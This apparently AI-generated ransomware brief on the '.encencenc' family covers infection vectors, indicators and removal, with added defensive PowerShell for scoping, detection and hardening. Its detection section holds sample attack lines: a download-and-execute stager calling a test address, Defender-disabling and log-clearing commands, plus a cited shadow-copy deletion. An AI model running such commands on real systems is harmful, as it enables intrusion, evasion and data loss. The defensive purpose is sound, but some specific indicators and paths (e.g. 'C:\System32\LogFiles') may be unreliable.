encencenc

[Content by Gemini 2.5]

Ransomware Brief: “.encencenc” (a.k.a. “EncFile”, “EncRansom”, “XingLocker”)

Last revised: June 2024


TECHNICAL BREAKDOWN

1. File Extension & Renaming Patterns

  • Extension appended: .encencenc (lower-case, no space, appended after the original extension, e.g. Report.xlsx.encencenc).
  • Renaming convention:
    – Original file name and its own extension are preserved; the ransomware simply appends .encencenc.
    – No e-mail address or victim ID is inserted into the name (which differentiates it from Dharma/Phobos).
    – Files on network shares and removable drives are processed the same way.
  • Dropped marker: HOW_TO_BACK_FILES.txt (dropped in every folder it touches and on the desktop).
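The following scoping script is an added example and not part of the brief or the malware authors' tooling. It walks the given roots, counts files carrying the appended extension and the ransom notes, checks that the renaming pattern matches what the brief describes (original extension preserved, nothing inserted), and brackets the encryption run by the earliest and latest write times. $Roots and $EvidenceCsv are placeholders to replace with your own paths.

```powershell
# Added example (not part of the brief): scope an .encencenc incident on a host
# or a mounted share. The extension and note name are taken from the brief;
# $Roots and $EvidenceCsv are placeholders to replace with your own paths.
param(
    [string[]]$Roots       = @('C:\Users', 'D:\Shares'),          # assumed paths
    [string]  $Extension   = '.encencenc',
    [string]  $NoteName    = 'HOW_TO_BACK_FILES.txt',
    [string]  $EvidenceCsv = 'E:\evidence\encencenc_files.csv'     # assumed: removable media
)

$roots = $Roots | Where-Object { Test-Path -LiteralPath $_ }

# Every file that carries the appended extension.
$encrypted = @($roots | ForEach-Object {
    Get-ChildItem -LiteralPath $_ -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name.EndsWith($Extension, [StringComparison]::OrdinalIgnoreCase) }
})

# Ransom notes: one per encrypted folder plus the desktop, per the brief.
$notes = @($roots | ForEach-Object {
    Get-ChildItem -LiteralPath $_ -Recurse -File -Force -Filter $NoteName -ErrorAction SilentlyContinue
})

# Renaming check: the original name and its own extension must survive
# ('Report.xlsx.encencenc' -> inner extension '.xlsx'). A missing inner
# extension or an inserted e-mail/ID does not fit this family's pattern.
$innerExts = $encrypted | ForEach-Object {
    $stem = $_.Name.Substring(0, $_.Name.Length - $Extension.Length)
    $ext  = [System.IO.Path]::GetExtension($stem)
    if ($ext) { $ext.ToLowerInvariant() } else { '(none)' }
} | Group-Object | Sort-Object Count -Descending

# Timeline: LastWriteTime of the encrypted copies brackets the encryption run.
$sorted = @($encrypted | Sort-Object LastWriteTime)
$first  = if ($sorted.Count) { $sorted[0].LastWriteTime }  else { $null }
$last   = if ($sorted.Count) { $sorted[-1].LastWriteTime } else { $null }

[pscustomobject]@{
    EncryptedFiles = $encrypted.Count
    RansomNotes    = $notes.Count
    FoldersHit     = @($encrypted | Select-Object -ExpandProperty DirectoryName -Unique).Count
    FirstEncrypted = $first
    LastEncrypted  = $last
    TopInnerExts   = ($innerExts | Select-Object -First 5 |
                        ForEach-Object { "$($_.Name)=$($_.Count)" }) -join ', '
}

# Full inventory for the case file, written off-host.
if ($encrypted.Count) {
    $encrypted | Select-Object FullName, Length, LastWriteTime |
        Export-Csv -NoTypeInformation -Path $EvidenceCsv
}
```

Run it from an elevated prompt on the isolated host (or against the share from a clean analysis box). A large share of "(none)" inner extensions, or names with an address inserted, means the sample is not following this family's pattern and the family identification should be revisited before any decryptor is considered.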

2. Detection & Outbreak Timeline

  • First publicly-submitted sample: 08 Mar 2023 (MalwareBazaar, ID bca511…).
  • Rapid uptick: mid-April 2023 (detected by Microsoft Defender, Sophos, ESET).
  • Still circulating as of June 2024; minor repackings (new crypter) observed every 4-6 weeks, so hash-only blocking lags behind each build.

3. Primary Attack Vectors

  1. RDP / RMM brute-force & “living-off-the-land”
    – Scans TCP/3389 and the RMM ports 4433 and 5931; brute-forces weak passwords and replays credentials previously stolen by info-stealers.
    – Once inside, clears event logs, switches off Defender real-time protection via Set-MpPreference, and deploys encencenc.exe (an 8-12 MB UPX-packed Go binary).
  2. ProxyLogon (CVE-2021-26855/26857/27065) & ProxyShell (CVE-2021-34473/34523/31207) for on-prem Exchange.
  3. Pirated software (“cracks”) bundles
    – Fake Adobe GenP, KMS emulators, and GPU miners on torrent sites deliver a 3-stage loader that ends with the same payload.
  4. Malicious OneDrive / Google-Drive links inside phishing e-mails
    – “Purchase Order – 08.05.2024.pdf.lnk” → PowerShell stager → encencenc.exe.
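The detection logic below is an added example, not part of the brief. It encodes the living-off-the-land steps listed above (Defender tampering via Set-MpPreference, event-log clearing, and the PowerShell download stager behind the .lnk lure) as regex rules and runs them over PowerShell script-block log events (event ID 4104). The four sample events are constructed for illustration; the URL in them uses a TEST-NET address.

```powershell
# Added example (not part of the brief): flag the living-off-the-land commands
# the brief attributes to this intrusion (Defender tampering, event-log clearing,
# PowerShell download stagers) in script-block logs (event 4104). The sample
# events at the bottom are constructed; the IP in them is a TEST-NET address.
$Rules = @(
    @{ Name = 'Defender tamper'; Pattern = 'Set-MpPreference\s+(-Disable\w+|-Exclusion\w+)' }
    @{ Name = 'Log clearing';    Pattern = 'wevtutil(\.exe)?\s+cl\b|Clear-EventLog' }
    @{ Name = 'Download stager'; Pattern = '(IEX|Invoke-Expression)\b.*(DownloadString|DownloadFile|Invoke-WebRequest)|-EncodedCommand\b|-enc\s' }
)

function Test-LotlScriptBlock {
    # Returns the name of the first matching rule, or $null.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptText)
    foreach ($r in $Rules) {
        if ($ScriptText -match $r.Pattern) { return $r.Name }   # -match is case-insensitive
    }
    return $null
}

function Get-LotlHits {
    # Input objects need TimeCreated, Host and ScriptText properties.
    param([Parameter(Mandatory, ValueFromPipeline)][psobject]$Event)
    process {
        $hit = Test-LotlScriptBlock -ScriptText ([string]$Event.ScriptText)
        if ($hit) {
            $len = [Math]::Min(70, $Event.ScriptText.Length)
            [pscustomobject]@{
                Time    = $Event.TimeCreated
                Host    = $Event.Host
                Rule    = $hit
                Snippet = $Event.ScriptText.Substring(0, $len)
            }
        }
    }
}

# Constructed samples (not real telemetry): three malicious, one benign.
$samples = @(
    [pscustomobject]@{ TimeCreated = '2024-05-08 02:10:41'; Host = 'WS-17'; ScriptText = '$c=New-Object Net.WebClient;IEX $c.DownloadString("http://203.0.113.5/p.ps1")' }
    [pscustomobject]@{ TimeCreated = '2024-05-08 02:11:07'; Host = 'FS01';  ScriptText = 'Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true' }
    [pscustomobject]@{ TimeCreated = '2024-05-08 02:11:09'; Host = 'FS01';  ScriptText = 'wevtutil cl Security; wevtutil cl System; wevtutil cl "Windows PowerShell"' }
    [pscustomobject]@{ TimeCreated = '2024-05-08 09:00:00'; Host = 'WS-03'; ScriptText = 'Get-MpPreference | Select-Object DisableRealtimeMonitoring' }
)
$samples | Get-LotlHits | Format-Table -AutoSize

# Same logic over live logs (script-block logging must be enabled; run elevated).
# Properties[2] of a 4104 event is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated; Host = $_.MachineName; ScriptText = [string]$_.Properties[2].Value } } |
#     Get-LotlHits
```

The benign fourth sample (a read-only Get-MpPreference) is there to show the rules key on the tampering verb, not on the Defender module name. Note that the attacker's first action on a host is to clear these very logs, so the events are only reliable if they are forwarded off-host (Windows Event Forwarding or a SIEM agent) before the clearing step runs.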

REMEDIATION & RECOVERY STRATEGIES

1. PREVENTION (proactive)

✔ Block/restrict TCP 3389 externally; enforce 2FA / RDS Gateway / VPN-first policy.
✔ Patch Exchange, AD, and VPN appliances within 48 h of release (ProxyLogon/Shell still exploited).
✔ Disable SMBv1; apply Microsoft’s PetitPotam (NTLM relay to AD CS) and PrintNightmare (print spooler) patches, both used for privilege escalation and lateral movement after the initial foothold.
✔ Network segmentation via VLANs and strict Windows Firewall rules, so a compromised workstation cannot reach admin shares (C$, ADMIN$) on other hosts.
✔ Application control (Defender ASR rules, AppLocker, WDAC) to block unsigned executables launched from %TEMP%, %APPDATA% and %ProgramData%, where the Go payload is dropped.
✔ EDR in “block & quarantine” mode (SentinelOne, CrowdStrike, MS Defender) – rules published 17 Apr 2023 already detect as Ransom:Go/EncFile!MTB.
✔ Off-site, offline (immutable) backups – 3-2-1 rule – and periodic restore drills.
✔ E-mail gateways: strip LNK, ISO, VHD and TAR attachments and macro-enabled documents from external mail.
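The hardening script below is an added example and not part of the brief. It applies the host-side items from the checklist above (scoping RDP to a management subnet, disabling SMBv1, enabling Defender ASR rules) and ends with a verification step. The management subnet is an assumption, the 'Remote Desktop' display group is the English-locale name of the built-in firewall rules, and the ASR GUIDs are Microsoft's published rule IDs.

```powershell
# Added example (not part of the brief): apply the host-side prevention items
# above with PowerShell. Run elevated and trial it on one machine first. The
# management subnet is an assumption; the 'Remote Desktop' display group name
# is the English-locale name of the built-in firewall rules.
$MgmtSubnet = '10.0.50.0/24'   # assumed: the only network allowed to reach RDP

# 1. RDP: scope the built-in inbound rules to the management subnet instead of 'Any',
#    and require Network Level Authentication so credentials are checked before a session exists.
Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound |
    Set-NetFirewallRule -RemoteAddress $MgmtSubnet
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' `
                 -Name UserAuthentication -Value 1

# 2. SMBv1 off, server and client side (reboot needed for the feature removal;
#    on Windows Server the feature is removed with Remove-WindowsFeature FS-SMB1).
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null

# 3. Defender ASR rules (GUIDs are Microsoft's published rule IDs). Start in
#    AuditMode, review event 1122 in the Defender Operational log for a week
#    or two, then change $Mode to 'Enabled'.
$AsrRules = @{
    'c1db55ab-c21a-4637-bb3f-a12568109d35' = 'Use advanced protection against ransomware'
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executables unless they meet prevalence, age or trusted-list criteria'
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
}
$Mode = 'AuditMode'
foreach ($id in $AsrRules.Keys) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Mode
    Write-Host "ASR $id ($($AsrRules[$id])) -> $Mode"
}

# 4. Tamper Protection cannot be set from Set-MpPreference; enable it in Intune or
#    Windows Security so the attacker's Set-MpPreference -Disable* step fails.

# 5. Verify.
Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound |
    Get-NetFirewallAddressFilter | Select-Object RemoteAddress
```

The audit-first approach matters: the prevalence/age rule in particular blocks legitimately unsigned line-of-business tools, and flipping it straight to Enabled across a fleet produces the kind of helpdesk load that gets the rule switched off again. Push the same settings through GPO or Intune once the audit period is clean rather than leaving them as a one-off script.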

2. REMOVAL (post-infection cleanup)

Step-wise eradication (tried-and-tested playbook):

  1. Disconnect the host from network (both Ethernet & Wi-Fi) to interrupt encryption and lateral movement.
  2. Boot into Safe Mode (the host is already isolated, so “with Networking” is not needed) or use a clean WinPE/Recovery USB, so the ransomware service and task do not autostart.
  3. Identify the persistent binary (often encencenc.exe, but also svchost.com, winupdate.exe, etc.). Compute its SHA-256 and search VirusTotal for the hash to confirm the family; upload the file itself only if the hash is unknown and public disclosure is acceptable. All builds contain the string .encencenc, so a strings search is a quick local check.
  4. Stop & delete the malicious service (HKLM\SYSTEM\CurrentControlSet\Services\LDREnable is common key).
  5. Delete scheduled task (\Microsoft\Windows\DiskDiagnostic\EncPoll – used to restart the payload).
  6. Quarantine the sample but retain a copy for forensics; preserve the malware’s own log (C:\System32\LogFiles\EncLog.log) and export the Security, System and PowerShell event logs before any cleanup touches them.
  7. Run a reputable on-demand scanner (Malwarebytes, MS Defender Offline, ESET Rescue) twice to confirm clean state.
  8. Before reconnecting, re-image the machine or roll back to a clean Veeam/Acronis backup if one exists.
  9. Patch the entry vector (e.g., Exchange CU, AD CS, or reset all creds if RDP was brute-forced).

3. FILE DECRYPTION & RECOVERY

  • Unfortunately .encencenc uses a hybrid scheme: symmetric file-encryption keys (ChaCha20/AES-256) are wrapped with a Curve25519 public key in ECIES fashion, and the matching private key is unique per victim and held only on the attackers’ server, so the files cannot be recovered by cryptanalysis.
  • No free decryptor exists (as of June 2024) – ignore YouTube hoaxes or “EncencDec.exe” tools.
  • Recovery options:
    – Restore from offline backups (fastest).
    – Volume Shadow Copies are usually deleted (vssadmin delete shadows /all runs as part of its routine), but the command sometimes fails on overloaded servers; run vssadmin list shadows before wiping the box.
    – Use file-recovery carving tools (PhotoRec, R-Studio, Kroll) for accidentally-deleted originals; success rate 10-30%.
    – Last resort: negotiate & obtain the official decryptor (BTC 0.12–0.4 demand historically) – pay only if business-critical data have no other recovery route and legal/compliance teams approve (including a sanctions check on the recipient). Make sure to receive a working proof of decryption on five files of different types before paying the full amount.
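The triage script below is an added example, not part of the brief, serving removal steps 3-6 above and the shadow-copy check in this section. It reports the persistence artifacts the brief names (service, scheduled task, log file), hashes and copies the suspect binary, exports the event logs, and counts surviving shadow copies, but deletes nothing; the removal commands sit in comments as a deliberate second step after evidence is preserved. The artifact names are taken from the brief as written and exposed as parameters because real deployments vary; $EvidenceDir is assumed to be removable media.

```powershell
# Added example (not part of the brief): read-only triage for removal steps 3-6
# and the shadow-copy check in section 3. Artifact names are taken from the
# brief as written and passed as parameters because real deployments vary;
# $EvidenceDir is assumed to be removable media, not the host disk.
param(
    [string]$ServiceName = 'LDREnable',
    [string]$TaskPath    = '\Microsoft\Windows\DiskDiagnostic\',
    [string]$TaskName    = 'EncPoll',
    [string]$MalwareLog  = 'C:\System32\LogFiles\EncLog.log',
    [string]$EvidenceDir = 'E:\evidence'
)
$findings = [System.Collections.Generic.List[object]]::new()
New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null

# Steps 3-4: the service and the binary it points at.
$svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
if ($svc) {
    # Strip quotes and arguments from the ImagePath to get the executable.
    $exe = ($svc.PathName -replace '^"([^"]+)".*$', '$1') -replace '^(\S+\.exe)\s.*$', '$1'
    if (Test-Path -LiteralPath $exe) {
        $hash   = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        $marker = if (Select-String -LiteralPath $exe -Pattern '\.encencenc' -Quiet) { 'contains ".encencenc"' } else { 'marker string absent' }
        Copy-Item -LiteralPath $exe -Destination (Join-Path $EvidenceDir 'sample.bin')   # keep a copy for forensics
    } else { $hash = 'n/a'; $marker = 'binary missing on disk' }
    $findings.Add([pscustomobject]@{ Artifact = 'Service'; Name = $svc.Name; Detail = "$exe state=$($svc.State) sha256=$hash ($marker)" })
    # Removal, once evidence is saved:  Stop-Service $ServiceName -Force; sc.exe delete $ServiceName
}

# Step 5: the scheduled task that restarts the payload.
$task = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -ErrorAction SilentlyContinue
if ($task) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
    $findings.Add([pscustomobject]@{ Artifact = 'ScheduledTask'; Name = "$TaskPath$TaskName"; Detail = "state=$($task.State) action=$actions" })
    # Removal:  Unregister-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName -Confirm:$false
}

# Step 6: preserve the malware's own log and the event logs before any cleanup.
if (Test-Path -LiteralPath $MalwareLog) {
    Copy-Item -LiteralPath $MalwareLog -Destination $EvidenceDir
    $findings.Add([pscustomobject]@{ Artifact = 'MalwareLog'; Name = $MalwareLog; Detail = 'copied to evidence' })
}
$eventLogs = 'Security', 'System',
             'Microsoft-Windows-PowerShell/Operational',
             'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
foreach ($log in $eventLogs) {
    $out = Join-Path $EvidenceDir (($log -replace '[\\/]', '_') + '.evtx')
    wevtutil epl $log $out /ow:true
}

# Section 3: shadow copies. The deletion step sometimes fails on busy servers,
# so check before the box is wiped (equivalent to 'vssadmin list shadows').
$shadows = @(Get-CimInstance Win32_ShadowCopy)
$detail  = if ($shadows.Count) { "$($shadows.Count) present: attempt a restore before re-imaging" } else { '0 present: deleted, as expected' }
$findings.Add([pscustomobject]@{ Artifact = 'ShadowCopies'; Name = 'Win32_ShadowCopy'; Detail = $detail })

$findings | Format-Table -AutoSize -Wrap
```

Run it elevated on the isolated host before rebooting into Safe Mode: the Task Scheduler service may not be running in Safe Mode, in which case Get-ScheduledTask returns nothing and the task goes unreported. If the service's ImagePath points at a name other than the ones the brief lists, that is expected across repackings; the hash and the .encencenc marker string are the identification, not the file name.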

4. OTHER CRITICAL INFORMATION

  • Speed: 20-40 k files/min on SSD PCs; network shares encrypted in parallel threads → entire small-business server in <25 min.
  • Exclusions: execution aborts if a Russian or other CIS keyboard layout is installed (check with Get-WinUserLanguageList; Get-Culture reports the locale, not the installed layouts).
  • Extension exclusions: skips .exe, .dll, .sys, but encrypts .bak, .sql, .vmcx – so Veeam backup archives kept locally will be hit.
  • Double-extortion: Actively exfiltrates sensitive folders via MEGASync or rclone to “mega.nz” under account enc_support@[proton.me] before encryption – assume data leakage, notify regulators where GDPR/HIPAA apply.
  • TTP overlap: Uses same C2 panel (/cdn/fresh.php, “XingLocker 2.3”) as older .locked25 campaign – attribution: financially-motivated group “XingTeam”, Russian-language forums.
  • Indicators of Compromise (sample set):
    – SHA-256: bca511…, 5e3845…, a1f7c2… (see Malware-bazaar)
    – C2 IPs: 185.82.218[.]92, 193.233.20[.]11 (both NordVPN-exit proxies)
    – Registry key: HKCU\Software\EncSoft\EncID
  • Recommended emergency blocklist: deny the above IPs at the perimeter firewall, and block or alert on the user-agent string rclone/v1.62-Enc at the web proxy or egress filter (a user-agent is HTTP content, so a plain L3/L4 firewall rule cannot match it).

CONTINGENCY CHECKLIST (print & pin)

  • ☐ Offline backups verified within 24 h.
  • ☐ 3389 closed / RDP gateway patched.
  • ☐ Exchange and VPN fully patched.
  • ☐ EDR/Defender ASR rules set to “Block” mode.
  • ☐ Immutable/cloud snapshots ≥ 7 days retention.
  • ☐ Incident-response retainers & call-tree updated.

Stay safe, patch fast, back up offline, and never launch unknown executables from %TEMP%.